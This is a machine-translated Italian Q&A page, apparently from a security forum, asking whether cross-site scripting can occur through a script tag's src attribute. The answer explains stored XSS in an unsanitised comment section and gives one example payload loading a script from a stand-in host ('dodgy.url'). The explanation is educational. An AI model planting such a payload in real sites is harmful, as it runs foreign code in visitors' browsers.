È possibile che XSS si verifichi nell'attributo src?

Naviga le tue risposte
3

Sto lavorando sulla vulnerabilità XSS e sulla sua comprensione. So che nei seguenti casi l'iniezione di script cross site avviene nel contesto Javascript

  1. Dentro il tag <script> .
  2. All'interno del tag html nei valori degli attributi del gestore eventi
  3. All'interno del valore dell'attributo, in javascript: URL.

Ora, c'è la possibilità che l'attacco XSS su JavaScript sia incluso direttamente usando l'attributo " src ".

es. <script src="./importjavascript.js"></script>

Se sì, allora potresti fornirci un esempio?

    
posta BSalunke 15.04.2016 - 12:04
fonte

1 risposta

2

Sì, e abbastanza facilmente (se ho capito bene la domanda).

Se un sito web ha una sezione commenti che consente all'utente di postare qualsiasi cosa (o qualsiasi sezione in cui permetta a un utente / visitatore di postare qualcosa) e restituisce ciò che inserisce esattamente come appare senza servizi igienico-sanitari, potrebbe inserire qualcosa come: 

<script src="http://dodgy.url/badscript.js"></script>

Se questo è stato quindi prodotto come normale HTML, chiunque visiti la pagina dovrebbe caricarlo per questo, probabilmente senza che il proprietario del sito lo sappia.

    
risposta data 15.04.2016 - 12:09
fonte

Leggi altre domande sui tag

manca ESSID da aircrack-ng E 'possibile rimuovere la password sulle nuove generazioni di Lenovo X1?